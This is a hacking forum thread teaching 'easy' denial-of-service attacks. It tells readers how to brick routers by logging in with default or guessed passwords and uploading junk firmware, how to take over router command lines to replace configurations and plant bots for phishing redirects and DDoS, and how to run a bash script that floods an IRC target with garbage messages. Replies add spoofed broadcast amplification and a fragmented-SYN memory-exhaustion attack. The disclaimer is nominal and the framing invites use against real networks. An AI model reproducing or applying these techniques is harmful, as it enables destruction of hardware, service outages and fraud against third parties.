#disclaimer - The information covered in this paper is for learning purposes only. The author holds no responsibility for the actions taken by individuals by the information disclosed within. The author is not liable for any damages caused by any individual using this information for malicious intent and or conspiracy to cause malicious intent. This is also not a 'step by step' paper. For the skript kiddies looking for easy answers, GO SOMEWHERE ELSE!

#intro - In this paper we are going to look at of the more uncommon or rarely heard of methods of Denial of Service. It's a well known fact that BotNets are used for Denial of Service attacks. It's a little known fact that you can do just as much damage without the hassle of having to go through the drawn out process of building a BotNet. I'm going to address a few methods, how they work, what they do, and how you yourself can use these techniques. Prepare to enter the world of easy DoS.

#definitions and pre-req. - A Denial of Service attack, also known as a Dos or DDoS, is an attempt to make a computer resource or network unavailable to legitimate intended users. A Denial of Service generally consists of efforts of a person or a group of people to prevent a website or service from from functioning correctly. A very common Denial of Service attack, which we are going to cover the methods of, involves saturating the target machine with external communication requests so that it cannot respond to legitimate traffic. There are many other types of a attacks for a denail of service. We are mainly concerned with only a few of them in this article.

As a pre-req for this paper, and for you to completely understand this, you need knowledge of the TCP/IP protocol and basic networking knowledge, server functions and request handling, basic packet structure theory and packet crafting, and fluid use of CLI and terminal functions

#phlashing//bricking - This is something relatively new, and not widely used but can be the most malicious of all the DoS types. Phlashing is considered a Permanent Denial of Service attack because it causes damage to the network on a hardware level, instead of software lever or by using up resources. In theory, phlashing is considered one of the easier levels of causing a Denial of Service but the most improbable to perform remotely. The Permanent Denial of Service relies on flaws in remote management interfaces of routers, printers and other networking/networked devices. Other flaws consist of default passwords, or easily bruteforced or 'guessable' passwords on root or administrator accounts for that device. These flaws leave the door open for an attacker to remotely update the device with modified, corrupt of defective firmware image. The updating of this router with faulty firmware 'bricks' the device rendering it useless and unable to serve the network in which it is placed.

Consider this hardware attack can be much faster and require less time then building a BotNet and is, for the most part, easily carried it out, it is of the most dangerous. Considering that, let us look at an attack in real time.

Now, considering the amount of IP's that are assigned to countries like the US, China, Japan and the UK, we are going to be scanning in a less populated country for misconfigured routers and the like. To make this a little more simple, we are going to look for a web based configuration pages. You may also be able to configure routers via telnet on port 23, but we can save that for later in the paper.

Let us take a look at a real life PoC.

http://i70.photobucket.com/albums/i91/O__RLY/bricked1.jpg

There are loads of these around, you just have to know where to look

http://i70.photobucket.com/albums/i91/O__RLY/bricked2.jpg

Updating the firmware/software of the router

You can open up notepad and type gibberish, or you can do whatever. Just so long as you have the correct extension.

http://i70.photobucket.com/albums/i91/O__RLY/bricked4.jpg

END_OF Bricking

#RouteNet

As we move on, I'm going to get into a little bit of CLI and routers. The most known way to configure routers is web based. You enter in your local gateway, get a login prompt and then you get a GUI to work with. What most people don't know is that routers also have a Command Line Interface that gives you way more functionality then the GUI.

http://i70.photobucket.com/albums/i91/O__RLY/bricked5.jpg

http://i70.photobucket.com/albums/i91/O__RLY/bricked6.jpg

I use putty to telnet into the router, just because it's clean and it's not shitty like the command prompt.

http://i70.photobucket.com/albums/i91/O__RLY/bricked7.jpg

As you can see, I've dumped the configuration file. It's displayed as plain text on the screen. This is most likely 'default'. The nice thing about this is, we can copy it over locally and edit the file to whatever we choose and we can upload it and replace it.

http://i70.photobucket.com/albums/i91/O__RLY/bricked8.jpg


http://i70.photobucket.com/albums/i91/O__RLY/bricked8.jpg

Now, every router is different because of vendor/model/version. Nothing is going to be universal. I'm not going to get into how to code up a bot, where to put the bot and how to use a bot because it's too much work for me, and how are you ever going to learn if you're taught EVERYTHING. The nice thing about having a bot on a router, depending on functionality, is that you now have a backdoor, and complete control over EVERYTHING. You can use this to point to a phisher for paypal/banks/credit cards or damn near anything. You can also use them for DDoS'es. This works out 10x better then computers because they do not make an AV for routers, also, routers are on 99% of the time unlike computers where they are shut down when you're done using them or go into hibernation.


Proof this isn't a one off.

http://i70.photobucket.com/albums/i91/O__RLY/bricked9.jpg

http://i70.photobucket.com/albums/i91/O__RLY/bricked10.jpg

Now, this isn't the only thing you can do while you have control over the router through the CLI. The possibilities is endless and you should let your imagination run wild.

#END_OF RoutNet

Seeing as I'm out of time right now, I'll update this thread with more information on techniques. If anyone else would like to add anything, clear up anything that is wrong with or just wants to ask questions you are more than welcome to. In fact, I urge you to help contribute to this. This is just just to help educate people on various well known and used and unknown and rarely used forms of DoS. As we go on I will try to explain more about Distributed attacks, smurf attacks, reflected attacks and other such things.

I FUCKING LOVE YOU

No homo. But seriously, major congrats on perfecting this. I remember when you discovered it last year in IRC. This is going to usher in a new age of hacking :eek::cool:

# IRC Join/Part Floods.

Another DoS attack (moreso a degradation instead of denial) that is very popular is the IRC Join/Part flood. These are mostly used when private servers have it out for one another, or someone very bored wants to aggravate a channel/server. As most people think, this is all done with BotNet. This isn't quite true. To have a very effective join/part flood, a BotNet would be ideal, but isn't needed to aggravate people. As now, most IRC servers limit connections to a server to one or two connections per IP address. We can work around that by creating a program that uses a list of proxies via HTTP/Socks/Wingates/ to connect through per bot that is spawned locally. Seeing as each bot uses it's own proxy, you are able to get around the 2 connections per IP rule.


#!/bin/bash

# A name for the script
NAME="[ooo]"

source common.sh

ooo () {
local period dest

echo "Period (in seconds) ?" 1>&2
read period

echo "Destination ?" 1>&2
read dest

declare -a char
char=(o o O)
declare -a ctrl
ctrl=($B $R $U ' #')
size=512

init
while true
do
buffer=""
i=0
while [ $i -lt $size ]
do
s1=""
n=$((RANDOM%5+1))
j=0
while [ $j -lt $n ]
do
s1=${s1}${char[((RANDOM%3))]}
let j=j+1
done
s2=${ctrl[$((RANDOM%4))]}
buffer=${buffer}${s1}${s2}
let i=i+n+1
done
echo -e "privmsg $dest :$buffer"
xsleep $period
done
}

if [ ${BASH_VERSION%%.*} -lt 2 ]
then
echo "This function is only available in bash 2.x"
fi

ooo | telnet $HOST $PORT



Of course, that's a bash script but there really isn't much to this. As long as you have a good amount of programming skills, you can pull it off fairly easily. There really isn't much more to explain. This is fairly easy to understand but it's an idea that I have never really heard many people talk about.

END_OF IRC Join/part flood

Also fun is the ZenMap/NMAP tool, providing all sort of goodies and other assorted niceties for the interested interloper:

http://i481.photobucket.com/albums/rr172/SpectraLPics/a.jpghttp://i481.photobucket.com/albums/rr172/SpectraLPics/b.jpghttp://i481.photobucket.com/albums/rr172/SpectraLPics/c.jpg

Thanks for the info.

OK, I spoke with Exploitz in IRC about this thread, and I figured I could add a little bit to it. There are a couple techniques we discussed which might be useful in creating a little disruption.

The first we discussed (and he's still attempting) is to take advantage of a subnet's broadcast address. By sending packets to a network's broadcast address, assuming they're following the protocol, you send a copy of those packets to every machine on the subnet -- multiplying your attacking power. But that's not the end of it. Let's say we have subnet 1 and subnet 2, and we want to DoS subnet 1. Let's assume subnet 2 is at least as large as subnet 1. So we send a packet to subnet 2's broadcast address, and we forge the packet's header to say the packet is from subnet 1's broadcast address. Now, each machine in subnet 2 will respond with either a SYN/ACK or a RST packet to subnet 1's broadcast address. Now, each machine in subnet 1 will respond with either SYN/ACK or RST packets to each machine in subnet 2.


Exploitz came up with this idea: Let's take that just one step farther. Let's forge a packet to have both the source and destination addresses be the broadcast address for some subnet. Now, it'll forward those packets to each machine, which will reply to the broadcast address for their own subnet, which will distribute the replies to all the machines, which will reply to each of the other machines.

Yes, it gets messy, but all that text just means that a lot of traffic is being sent based on just one packet. Imagine running thousands of packets through that mess.

Of course, to defend against this, simply disallow broadcasting in your network stack, or firewall the broadcast addresses.


The remaining technique we discussed is something I've mentioned before. Let's forge a packet directed to the machine, with the flags set to SYN/FRAG/MOREFRAGS (that is, start of communication and fragmented, with more fragments to follow). We set the fragment offset to zero so that the first fragment is sent, but never any others.

The result of this technique is three forms of DoS in one: First, you take up bandwidth, as you are presumably sending fragments like this in quick succession. Second, you take memory space, as each of those fragmented packets has to be stored in memory until either the packet times out or is fully reassembled (which will never happen). Third, you take up CPU time, as the machine is trying to figure out how to reassemble the packets you're feeding it. Such a target should come to a screeching halt unless it has patches to prevent this attack from working.


If I can think of any more I'll post again later.

grab net tools from download.com.. and use the udp flooders with this?... humm some other tools come with its package.... could be fun to explore with this.

Wow, dude. Great post! For about two years now, I've been thinking on and off about this very thing, but I've never gone in-depth as much as you have. For a while now, I've been thinking of all the different ways that this is advantageous is comparison to regular DDoS, most of which you have listed. I really think that the next huge revolution in the field will be this very thing.

I really have a lot to say about this, but it's almost 2am, and I can't seem to get all of my thoughts organized. I'll try to post some of my thoughts later.

Thanks for bringing this up, I hadn't given it much thought in a while.

Cool thread now voice me in IRC please.